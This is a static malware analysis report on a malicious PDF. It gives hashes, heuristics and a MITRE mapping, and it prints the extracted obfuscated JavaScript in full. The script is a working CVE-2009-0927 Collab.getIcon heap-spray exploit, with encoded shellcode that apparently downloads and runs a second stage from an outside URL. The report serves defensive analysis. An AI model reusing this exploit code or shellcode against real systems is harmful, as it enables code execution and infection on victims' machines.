Malicious PDF — malware analysis report

Static analysis result for SHA-256 d65a34d3b2c61c19…

MALICIOUS

PDF

1.5 KB First seen: 2026-05-10
MD5: 13cd6f7f8742c7011b807d9e49ebf50e SHA-1: 4c5f49d6456c1913575763f4085e8add75fd0cb7 SHA-256: d65a34d3b2c61c1963b2e9d36e481041ddfa07059c373c514d65f3c70af4466c
208 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1027 Obfuscated Files or Information

The PDF file contains embedded JavaScript, identified by the PDF_JAVASCRIPT and PDF_JS heuristics. The PDF_UNESCAPE heuristic indicates that the JavaScript is obfuscated, likely to hide its malicious intent. The extracted artifact 'javascript_obj111111_000.js' is the result of this obfuscation. The primary function of this script is to download and execute a second-stage payload, a common technique for initial access and further infection.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 5

  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    return unescape(cmjny);
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj111111_000.js pdf-javascript-stream PDF /JS object 111111 at offset 0x160 2237 bytes
SHA-256: 824aa5801fd9c25c60633282eb13242e7b916381b043fced6ef939933f7ea110
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function apera(cmjny)
{
return unescape(cmjny);
}
var fvhodo = '%09';
var izapbs = 'ARG9090ARG9090'.replace(/ARG/igm,'%u');
var kogqa = 'Z535XZ5251Z5756Z9c55ZXXe8ZXXXXZ5dXXZed83Z31XdZ64cXZ4XX3Z783XZ8bXcZXc4XZ7X8bZad1cZ4X8bZebX8Z8bX9Z344XZ4X8dZ8b7cZ3c4XZ5756Z5ebeZXXX1ZX1XXZbfeeZX14eZXXXXZefX1Zd6e8ZXXX1Z5fXXZ895eZ81eaZ5ec2ZXXX1Z52XXZ8X68ZXXXXZffXXZ4e95ZXXX1Z89XXZ81eaZ5ec2ZXXX1Z31XXZX1f6Z8ac2Z359cZX263ZXXXXZfb8XZ74XXZ88X6Z321cZeb46Zc6eeZ32X4Z89XXZ81eaZ45c2ZXXX2Z52XXZ95ffZX152ZXXXXZea89Zc281ZX25XZXXXXZ5X52Z95ffZX156ZXXXXZXX6aZXX6aZea89Zc281ZX15eZXXXXZ8952Z81eaZ78c2ZXXX2Z52XXZXX6aZdXffZX56aZea89Zc281ZX15eZXXXXZff52Z5a95ZXXX1Z89XXZ81eaZ5ec2ZXXX1Z52XXZ8X68ZXXXXZffXXZ4e95ZXXX1Z89XXZ81eaZ5ec2ZXXX1Z31XXZX1f6Z8ac2Z359cZX26eZXXXXZfb8XZ74XXZ88X6Z321cZeb46Zc6eeZ32X4Z89XXZ81eaZ45c2ZXXX2Z52XXZ95ffZX152ZXXXXZea89Zc281ZX25XZXXXXZ5X52Z95ffZX156ZXXXXZXX6aZXX6aZea89Zc281ZX15eZXXXXZ8952Z81eaZa6c2ZXXX2Z52XXZXX6aZdXffZX56aZea89Zc281ZX15eZXXXXZff52Z5a95ZXXX1Z9dXXZ5f5dZ5a5eZ5b59Zc358ZXXXXZXXXXZXXXXZXXXXZXXXXZXXXXZXXXXZXXXXZ6547Z5474Z6d65Z5X7XZ7461Z4168Z4cXXZ616fZ4c64Z6269Z6172Z7972ZXX41Z6547Z5X74Z6f72Z4163Z6464Z6572Z7373Z57XXZ6e69Z7845Z6365ZbbXXZf289Zf789ZcX3XZ75aeZ29fdZ89f7Z31f9ZbecXZXX3cZXXXXZb5X3ZX21bZXXXXZad66Z85X3ZX21bZXXXXZ7X8bZ8378Z1cc6Zb5X3ZX21bZXXXXZbd8dZX21fZXXXXZX3adZ1b85ZXXX2ZabXXZX3adZ1b85ZXXX2Z5XXXZadabZ85X3ZX21bZXXXXZ5eabZdb31Z56adZ85X3ZX21bZXXXXZc689Zd789Zfc51Za6f3Z7459Z5eX4Zeb43Z5ee9Zd193ZX3eXZ2785ZXXX2Z31XXZ96f6Zad66ZeXc1ZX3X2Z1f85ZXXX2Z89XXZadc6Z85X3ZX21bZXXXXZebc3ZXX1XZXXXXZXXXXZXXXXZXXXXZXXXXZXXXXZXXXXZ89XXZ1b85ZXXX2Z56XXZe857Zff58ZffffZ5e5fZX1abZ8XceZbb3eZX274ZedebZ55c3Z4c52Z4f4dZ2e4eZ4c44ZXX4cZ5255Z444cZ776fZ6c6eZ616fZ5464Z466fZ6c69Z4165Z7XXXZ6664Z7X75Z2e64Z7865ZXX65Z7263Z7361Z2e68Z687XZXX7XZ7468Z7X74Z2F3AZ612FZ6C6CZ6261Z753XZ6274Z6E61Z2E6BZ6F63Z2F6DZ7X65Z6C2FZ7X2EZ7X68Z693FZ363DZ9XXX'.replace(/Z/igm,'%u').replace(/X/igm,'0');
fvhodo=apera(fvhodo);
izapbs=apera(izapbs);
kogqa=apera(kogqa);
while (izapbs.length * 2 < 0x3fffc8-kogqa.length * 2){izapbs += izapbs;}
izapbs = izapbs.substr(0, (0x3fffc8-kogqa.length * 2) / 2);
var fskoi = new Array();
for (var xrjng = 0; xrjng < 47; xrjng ++ ){fskoi[xrjng] = izapbs + kogqa;}
while (fvhodo.length < 0x4000)fvhodo += fvhodo;
fvhodo="N." + fvhodo;
combined_document_js_000.js deobfuscated-js combined document JavaScript streams at offset 0x160 2269 bytes
SHA-256: 3acbb7bf75c24ef3c238b0e39cf6e6efaf344adea10c0075ae17099746e6886b
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function apera(cmjny)
{
return unescape(cmjny);
}
var fvhodo = '%09';
var izapbs = 'ARG9090ARG9090'.replace(/ARG/igm,'%u');
var kogqa = 'Z535XZ5251Z5756Z9c55ZXXe8ZXXXXZ5dXXZed83Z31XdZ64cXZ4XX3Z783XZ8bXcZXc4XZ7X8bZad1cZ4X8bZebX8Z8bX9Z344XZ4X8dZ8b7cZ3c4XZ5756Z5ebeZXXX1ZX1XXZbfeeZX14eZXXXXZefX1Zd6e8ZXXX1Z5fXXZ895eZ81eaZ5ec2ZXXX1Z52XXZ8X68ZXXXXZffXXZ4e95ZXXX1Z89XXZ81eaZ5ec2ZXXX1Z31XXZX1f6Z8ac2Z359cZX263ZXXXXZfb8XZ74XXZ88X6Z321cZeb46Zc6eeZ32X4Z89XXZ81eaZ45c2ZXXX2Z52XXZ95ffZX152ZXXXXZea89Zc281ZX25XZXXXXZ5X52Z95ffZX156ZXXXXZXX6aZXX6aZea89Zc281ZX15eZXXXXZ8952Z81eaZ78c2ZXXX2Z52XXZXX6aZdXffZX56aZea89Zc281ZX15eZXXXXZff52Z5a95ZXXX1Z89XXZ81eaZ5ec2ZXXX1Z52XXZ8X68ZXXXXZffXXZ4e95ZXXX1Z89XXZ81eaZ5ec2ZXXX1Z31XXZX1f6Z8ac2Z359cZX26eZXXXXZfb8XZ74XXZ88X6Z321cZeb46Zc6eeZ32X4Z89XXZ81eaZ45c2ZXXX2Z52XXZ95ffZX152ZXXXXZea89Zc281ZX25XZXXXXZ5X52Z95ffZX156ZXXXXZXX6aZXX6aZea89Zc281ZX15eZXXXXZ8952Z81eaZa6c2ZXXX2Z52XXZXX6aZdXffZX56aZea89Zc281ZX15eZXXXXZff52Z5a95ZXXX1Z9dXXZ5f5dZ5a5eZ5b59Zc358ZXXXXZXXXXZXXXXZXXXXZXXXXZXXXXZXXXXZXXXXZ6547Z5474Z6d65Z5X7XZ7461Z4168Z4cXXZ616fZ4c64Z6269Z6172Z7972ZXX41Z6547Z5X74Z6f72Z4163Z6464Z6572Z7373Z57XXZ6e69Z7845Z6365ZbbXXZf289Zf789ZcX3XZ75aeZ29fdZ89f7Z31f9ZbecXZXX3cZXXXXZb5X3ZX21bZXXXXZad66Z85X3ZX21bZXXXXZ7X8bZ8378Z1cc6Zb5X3ZX21bZXXXXZbd8dZX21fZXXXXZX3adZ1b85ZXXX2ZabXXZX3adZ1b85ZXXX2Z5XXXZadabZ85X3ZX21bZXXXXZ5eabZdb31Z56adZ85X3ZX21bZXXXXZc689Zd789Zfc51Za6f3Z7459Z5eX4Zeb43Z5ee9Zd193ZX3eXZ2785ZXXX2Z31XXZ96f6Zad66ZeXc1ZX3X2Z1f85ZXXX2Z89XXZadc6Z85X3ZX21bZXXXXZebc3ZXX1XZXXXXZXXXXZXXXXZXXXXZXXXXZXXXXZXXXXZ89XXZ1b85ZXXX2Z56XXZe857Zff58ZffffZ5e5fZX1abZ8XceZbb3eZX274ZedebZ55c3Z4c52Z4f4dZ2e4eZ4c44ZXX4cZ5255Z444cZ776fZ6c6eZ616fZ5464Z466fZ6c69Z4165Z7XXXZ6664Z7X75Z2e64Z7865ZXX65Z7263Z7361Z2e68Z687XZXX7XZ7468Z7X74Z2F3AZ612FZ6C6CZ6261Z753XZ6274Z6E61Z2E6BZ6F63Z2F6DZ7X65Z6C2FZ7X2EZ7X68Z693FZ363DZ9XXX'.replace(/Z/igm,'%u').replace(/X/igm,'0');
fvhodo=apera(fvhodo);
izapbs=apera(izapbs);
kogqa=apera(kogqa);
while (izapbs.length * 2 < 0x3fffc8-kogqa.length * 2){izapbs += izapbs;}
izapbs = izapbs.substr(0, (0x3fffc8-kogqa.length * 2) / 2);
var fskoi = new Array();
for (var xrjng = 0; xrjng < 47; xrjng ++ ){fskoi[xrjng] = izapbs + kogqa;}
while (fvhodo.length < 0x4000)fvhodo += fvhodo;
fvhodo="N." + fvhodo;
app.doc.Collab.getIcon(fvhodo);

Open this report in the interactive analyzer, or submit your own file for analysis.